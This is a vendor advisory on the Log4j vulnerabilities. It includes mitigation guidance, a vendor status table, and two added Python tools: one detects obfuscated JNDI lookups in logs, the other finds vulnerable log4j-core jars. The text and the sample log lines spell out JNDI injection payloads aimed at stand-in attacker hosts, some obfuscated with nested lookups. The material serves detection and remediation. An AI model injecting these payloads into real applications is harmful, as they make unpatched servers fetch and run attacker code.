
Apache Log4j 2 Vulnerability Notice


CVE-2021-45046

Softcat is aware of a further CVE relating to the Apache Log4j vulnerability. The fix shipped in 2.15.0 was incomplete: in certain non-default configurations, deployments of Log4j 2 (versions 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0) remain exploitable where the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example ${ctx:loginId}) or a Thread Context Map pattern, because an attacker who controls Thread Context Map input can still supply a JNDI lookup pattern. This was originally assessed as a denial of service with a much lower CVSS score (3.7) than CVE-2021-44228; Apache subsequently raised the score to 9.0 after it was shown to allow information leak and, in some environments, remote code execution, so it should not be treated as low risk. Version 2.16.0 (the recommended fix for this vulnerability) disables JNDI by default and removes support for message lookups entirely. More information on this vulnerability can be found in Apache's Log4j security advisory.


What we know so far

Log4j 2 is an open-source Java logging library developed by the Apache Software Foundation. It is widely used and is present in many applications and services as a dependency, often a transitive one that the application's own developers have never listed. This includes enterprise applications, custom applications developed within an organisation, and numerous cloud services. The Log4j 2 library is frequently used in enterprise Java software and is included in Apache projects including:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

Apache Log4j 2 versions 2.14.1 and lower (CVE-2021-44228) include JNDI features, used in configuration, log messages and parameters, that do not protect against attacker-controlled LDAP and other JNDI-related endpoints. Every string that is logged is subject to lookup substitution, so an attacker who can control log messages or log message parameters (for example by placing a string such as ${jndi:ldap://attacker-host/a} in a User-Agent header, username or form field that the application logs) can cause the JVM to fetch and execute arbitrary code from an attacker-controlled server when message lookup substitution is enabled. The attacker does not need to reach the logging host directly: any upstream component that forwards the string into a Log4j 2 log line is sufficient.
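The lookup substitution described above is also what makes exploitation attempts recognisable in logs, but attackers nest other Log4j lookups (${lower:j}, ${::-j}, ${env:X:-j}) to evade a naive search for "${jndi:". The detector below is an added example written for this page, not code from Apache or Softcat; it emulates those lookups to de-obfuscate each line before searching for the jndi: prefix, and runs over constructed sample access-log lines (the addresses and payloads are made up, not captured traffic).

```python
import re

# Innermost ${...} containing no nested lookup; resolved first so nested obfuscation unwinds.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# After normalisation a lookup reads "jndi:<scheme>:<target>"; lookup names are case-insensitive.
JNDI = re.compile(r"jndi:\s*([a-z][a-z0-9+.-]*:[^\s\"'}]*)", re.IGNORECASE)

# Constructed sample access-log lines (addresses and payloads are made up, not captured traffic).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://198.51.100.7/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 12 "-" "${${env:NO_SUCH_VAR:-j}ndi:dns://198.51.100.7/d}"',
    '10.0.0.3 - - [10/Dec/2021:14:02:17 +0000] "GET /reports/${date:yyyy} HTTP/1.1" 200 12',
]


def resolve_innermost(body: str) -> str:
    """Emulate the Log4j 2 lookups attackers nest for obfuscation, for one innermost ${...} body."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    # "${name:key:-default}" yields the default when the lookup fails; "${::-j}" is the degenerate
    # form. A jndi: body is left intact so the detector can see it after unwrapping.
    if ":-" in body and not low.startswith("jndi:"):
        return body.split(":-", 1)[1]
    # Anything else (date:, ctx:, sys:, jndi:, unknown) is unwrapped so the loop terminates.
    return body


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Repeatedly collapse innermost lookups until nothing changes or the round limit is hit."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(lambda m: resolve_innermost(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(line: str):
    """Return [(scheme, target), ...] for every JNDI lookup in the line after de-obfuscation."""
    hits = []
    for m in JNDI.finditer(normalize_lookups(line)):
        target = m.group(1)
        hits.append((target.split(":", 1)[0].lower(), target))
    return hits


def scan_log(lines):
    """Return (line_number, scheme, target) for each hit across a log, for alerting or triage."""
    return [(n, scheme, target)
            for n, line in enumerate(lines, 1)
            for scheme, target in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, scheme, target in scan_log(SAMPLE_LOG_LINES):
        print(f"line {n}: jndi lookup via {scheme} -> {target}")
```

The scheme is reported separately because it changes the triage: ldap and rmi targets indicate a remote-class-loading attempt, while a dns target is usually a scanner confirming that lookups fire, and both are worth correlating with outbound connection logs from the host that wrote the line.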


What can customers do about it?

The most important fix available for this vulnerability is to update Log4j to version 2.16.0 or later. Where Log4j is bundled inside a third-party product, apply the vendor's own update as releases become available rather than swapping the jar yourself, since the vendor's next update may reinstate the old library. Where an upgrade cannot be deployed immediately, Apache's mitigation is to remove the JndiLookup class from the log4j-core jar; the earlier advice to set log4j2.formatMsgNoLookups to true is not sufficient on its own now that CVE-2021-45046 is known. In either case, confirm the fix by checking the version and contents of every copy of log4j-core on the host, including copies nested inside WAR, EAR and shaded jars, not only the one your build tool reports.
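Updating is only possible once you know where every copy of log4j-core sits, and it is often inside a WAR or a shaded application jar rather than a loose file. The scanner below is an added example written for this page, not Softcat's or Apache's tooling; it walks a directory tree, recurses into nested archives, reads the version from log4j-core's own Maven metadata, notes whether JndiLookup.class is still present, and classifies each copy against the version boundaries given in this notice. It runs against constructed fixture jars that it builds in a temporary directory, so the file names and contents are made up and the version-string parsing is the only part that touches real jar conventions.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path
from typing import NamedTuple, Optional

# Paths inside a log4j-core jar. Removing JndiLookup.class is the mitigation Apache describes
# for CVE-2021-44228/CVE-2021-45046 where an upgrade cannot be deployed immediately.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_MARKER = "org/apache/logging/log4j/core/Logger.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


class Finding(NamedTuple):
    location: str             # on-disk path; "!/" separates nested archive members
    version: Optional[str]    # None for shaded jars whose Maven metadata was stripped
    jndi_class_present: bool
    status: str


def parse_version(v: str):
    """'2.14.1' -> (2, 14, 1, ''); '2.0-beta9' -> (2, 0, 0, 'beta9'); None if unparseable."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z0-9]+))?", v.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0), (m[4] or "").lower()) if m else None


def assess(version: Optional[str], jndi_class_present: bool) -> str:
    if version is None:
        return ("vulnerable (version unknown, JndiLookup present)" if jndi_class_present
                else "log4j-core present, version unknown, JndiLookup absent: verify manually")
    p = parse_version(version)
    if p is None or p[0] != 2:
        return "unrecognised version: verify manually"
    _, minor, patch, pre = p
    beta = re.fullmatch(r"beta(\d+)", pre)
    if (minor, patch) == (0, 0) and beta and int(beta[1]) < 9:
        return "not affected (pre-dates lookup support)"
    # 2.16.0+ is the fix this notice recommends; 2.12.2+ and 2.3.1+ are Apache's Java 7 / Java 6 backports.
    if (minor, patch) >= (16, 0) or (minor == 12 and patch >= 2) or (minor == 3 and patch >= 1):
        return "fixed"
    if not jndi_class_present:
        return "mitigated (JndiLookup.class removed)"
    return "CVE-2021-45046 only" if (minor, patch) == (15, 0) else "vulnerable (CVE-2021-44228, CVE-2021-45046)"


def scan_archive(data: bytes, location: str, findings: list, depth: int = 0) -> None:
    """Inspect one in-memory archive, then recurse into archives nested inside it (WEB-INF/lib etc.)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return                                   # corrupt or non-zip member: skip it, keep scanning
    with zf:
        names = set(zf.namelist())
        jndi = JNDI_LOOKUP_CLASS in names
        if POM_PROPS in names:
            props = dict(ln.split("=", 1) for ln in zf.read(POM_PROPS).decode().splitlines() if "=" in ln)
            version = props.get("version", "").strip() or None
            findings.append(Finding(location, version, jndi, assess(version, jndi)))
        elif CORE_MARKER in names:               # shaded/uber jar: classes present, metadata gone
            findings.append(Finding(location, None, jndi, assess(None, jndi)))
        if depth < 4:                            # bound recursion into nested archives
            for n in sorted(names):
                if n.lower().endswith(ARCHIVE_SUFFIXES):
                    scan_archive(zf.read(n), f"{location}!/{n}", findings, depth + 1)


def scan_tree(root: Path) -> list:
    findings: list = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            scan_archive(p.read_bytes(), p.relative_to(root).as_posix(), findings)
    return findings


def make_core_jar(version: Optional[str], include_jndi: bool) -> bytes:
    """Constructed stand-in for a log4j-core jar: marker class, optional metadata, optional JndiLookup."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(CORE_MARKER, b"")
        if version:
            zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


def build_fixtures(root: Path) -> None:
    """Constructed layout, not real software: loose jars, a shaded jar, and a WAR nesting an old core."""
    for rel, version, jndi in [("lib/log4j-core-2.14.1.jar", "2.14.1", True),
                               ("lib/log4j-core-2.14.1-stripped.jar", "2.14.1", False),
                               ("lib/log4j-core-2.15.0.jar", "2.15.0", True),
                               ("lib/log4j-core-2.16.0.jar", "2.16.0", True),
                               ("app/service-all.jar", None, True)]:
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(make_core_jar(version, jndi))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_core_jar("2.14.1", True))
        zf.writestr("WEB-INF/lib/damaged.jar", b"not a zip")   # must not abort the scan
    (root / "webapps").mkdir()
    (root / "webapps" / "portal.war").write_bytes(war.getvalue())


def run_demo() -> dict:
    """Build the fixtures in a temporary directory, scan them, and return {location: status}."""
    with tempfile.TemporaryDirectory() as d:
        build_fixtures(Path(d))
        return {f.location: f.status for f in scan_tree(Path(d))}
```

Point scan_tree at a real filesystem root to use it in anger. The version string comes from the jar's own pom.properties rather than its file name, because vendors routinely rename or repackage the library; the shaded-jar branch exists because uber jars often drop that metadata entirely, and a host with no loose log4j-core file can still be running a vulnerable copy.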


Statement from Softcat:

Softcat's Information Security team, with the assistance of our Cyber Services team, has been responding to the Log4j vulnerability since we became aware of it on 10th December. This issue has board-level visibility, and ensuring Softcat remains resilient against this new vulnerability is a priority for us.

Since becoming aware, our teams began utilising several overlapping techniques to identify the presence of Log4j in our estate, initially focusing on externally facing resources and continuing to those in our private networks. We have completed an assessment of external-facing applications and have not identified any that are vulnerable. Where we have identified software vendors used on our private network (not internet facing) that include Log4j as a component, we are utilising a combination of detective and protective security controls to mitigate the risk while fixes from the vendor are deployed. Not all services utilising a vulnerable version of Log4j can be exploited or easily exploited, and we have prioritised them accordingly. Because this is a multifaceted effort, there is no single ETA for blanket remediation.

We can confirm our ecommerce platform, eCAT, does not use Log4j.

Customers of Softcat's own managed service offerings can contact their service delivery manager to get a detailed update for the service(s) they are consuming. Software utilised by some customers of Softcat's Backup as a Service and Managed Print Service offerings is impacted, and fixes have been released by the vendor to address this vulnerability. Customer contacts for these services have been notified by our service delivery team, who are able to assist customers with any additional questions.

We have observed no indications that any systems or data have been compromised, and remain vigilant to any events related to Log4j exploits.


Updates from our vendors

We want to ensure our customers are protected and kept in the loop with the latest updates from our vendors.

Softcat has been monitoring the vendor ecosystem since the public release of this vulnerability on 10th December 2021, and is regularly updating the tables below. Vendors are grouped into one of four categories, and where possible references are provided. Note that "Not Affected" reflects the vendor's own statement at the time it was recorded; a vendor's status can change as its investigation progresses, so re-check the vendor advisory before closing an item.

Classification | Definition
Confirmed | At least one product is vulnerable.
Under Investigation | Vendor is currently reviewing their posture.
Not Affected | Vendor has stated no products are vulnerable.
Awaiting Communication | No release from the vendor was found.


The current list of vendors is as follows:

Vendor | Is affected? | Reference available
Adobe | Confirmed | Read Here
Akamai | Confirmed | Read Here
AlienVault/AT&T | Not Affected | Softcat confirmed directly with AlienVault
Amazon Web Services | Confirmed | Read Here
APC | Awaiting Communication | -
Apple | Confirmed | iCloud vulnerable; no reference available
Arcserve | Not Affected | Softcat confirmed directly with Arcserve; no reference available
Arista | Confirmed | Read Here
Attivo | Awaiting Communication | -
Avaya | Confirmed | Read Here
Barracuda | Not Affected | Read Here
Beyond Trust | Awaiting Communication | -
BitDefender | Under Investigation | Read Here
Blackberry | Awaiting Communication | -
BMC Software | Confirmed | Read Here
Carbon Black | Confirmed | Read Here
Cato Networks | Not Affected | Read Here
Check Point | Not Affected | Read Here
Cisco Systems | Confirmed | Read Here
Citrix Systems | Under Investigation | Read Here
Cloudhealth | Under Investigation | Read Here
Cohesity | Not Affected | Read Here
CommVault | Confirmed | Read Here
Corero | Awaiting Communication | -
Crowdstrike | Not Affected | Read Here
CyberArk | Confirmed | Read Here
CyberReason | Not Affected | Read Here
Cylance | Awaiting Communication | -
Datto | Not Affected | Read Here
Dell | Confirmed | Read Here
Docusign | Not Affected | Read Here
Druva | Under Investigation | Read Here
DuoSecurity | Confirmed | Read Here
Edgenexus | Not Affected | Softcat confirmed directly with Edgenexus
Egress | Confirmed | Read Here
Elastic | Confirmed | Read Here
F5 Networks | Under Investigation | Read Here
Forcepoint | Confirmed | Read Here
Forescout | Confirmed | Read Here
Fortinet | Confirmed | Read Here
F-Secure | Confirmed | Read Here
Gemalto | Awaiting Communication | -
GN | Awaiting Communication | -
Google | Confirmed | Read Here
GrayLog | Confirmed | Read Here
Hewlett Packard Enterprise | Confirmed | Read Here
HP Inc | Awaiting Communication | -
Huawei | Confirmed | Read Here
iManage (Zendesk) | Confirmed | Read Here
IBM | Confirmed | Read Here
IBM Licence Metric Tool | Confirmed | Read Here
Imperva | Not Affected | Read Here
Indeni | Not Affected | Softcat confirmed directly with Indeni
Informatica | Confirmed | Read Here
Infortrend | Awaiting Communication | -
Ivanti | Confirmed | Read Here
Jamf | Confirmed | Read Here
Jenkins | Under Investigation | Read Here
Jira | Confirmed | Read Here
Kaspersky | Not Affected | Read Here
Kemp | Not Affected | Read Here
Knowbe4 | Awaiting Communication | -
LastPass | Confirmed | Read Here
Lenovo | Confirmed | Read Here
LogRhythm | Confirmed | Read Here
ManagedEngine | Confirmed | Read Here
McAfee | Under Investigation | Read Here
Microfocus | Confirmed | Read Here
Microsoft | Under Investigation | Read Here
Mimecast | Not Affected | Read Here
N-able | Not Affected | Read Here
NetApp | Confirmed | Read Here
Netmotion | Awaiting Communication | -
Netwrix | Confirmed | Read Here
New Relic | Confirmed | Read Here
Nutanix | Confirmed | Read Here
Okta | Confirmed | Read Here
One Login | Awaiting Communication | -
OneIdentity | Under Investigation | Read Here
Opswat | Awaiting Communication | -
Oracle | Confirmed | Read Here
Origin Storage Solutions | Awaiting Communication | -
Palo Alto | Not Affected | Read Here
Patch My PC | Awaiting Communication | -
PingIdentity | Under Investigation | Read Here
Poly | Awaiting Communication | -
Proofpoint | Confirmed | Read Here
Pulse Secure | Not Affected | Read Here
Puppet | Confirmed | Read Here
Pure Storage | Confirmed | Read Here
Qlik | Confirmed | Read Here
Qualys | Confirmed | Read Here
Quest | Confirmed | Read Here
Rapid7 | Under Investigation | Read Here
Red Hat | Confirmed | Read Here
Riverbed | Confirmed | Read Here
RSA | Confirmed | Read Here
Rubrik | Confirmed | Read Here
SailPoint | Under Investigation | Read Here
Salesforce | Under Investigation | Read Here
Samsung | Awaiting Communication | -
SAP | Confirmed | Read Here
Science Logic | Not Affected | Read Here
SecurEnvoy | Awaiting Communication | -
SentinelOne | Not Affected | Read Here
ServiceNow | Under Investigation | Read Here
Siemens | Confirmed | Read Here
Skybox | Confirmed | Read Here
Snow Software | Confirmed | Read Here
Solarwinds | Confirmed | Read Here
SonicWALL | Confirmed | Read Here
Sophos | Confirmed | Read Here
SpanningCloud Apps | Awaiting Communication | -
Splunk | Confirmed | Read Here
STEALTHbits | Awaiting Communication | -
Swimlane | Not Affected | Softcat confirmed directly with Swimlane
Symantec | Confirmed | Read Here
SysAid | Confirmed | Read Here
Tableau | Confirmed | Read Here
Tanium | Not Affected | Read Here
TeamViewer | Confirmed | Read Here
Tenable Network Security | Under Investigation | Softcat confirmed directly with Tenable
Thales | Confirmed | Read Here
ThousandEye | Confirmed | Read Here
Trend Micro | Under Investigation | Read Here
Tripwire | Confirmed | Read Here
Trustwave | Not Affected | Read Here
Tufin Software | Awaiting Communication | -
Ubiquiti | Confirmed | Read Here
Varonis | Under Investigation | Read Here
Veeam | Not Affected | Read Here
Veritas | Confirmed | Read Here
VMware | Confirmed | Read Here
WatchGuard | Not Affected | Read Here
Yealink | Awaiting Communication | -
Zebra Technologies | Confirmed | Read Here
Zoom | Awaiting Communication | -
Zscaler | Not Affected | Read Here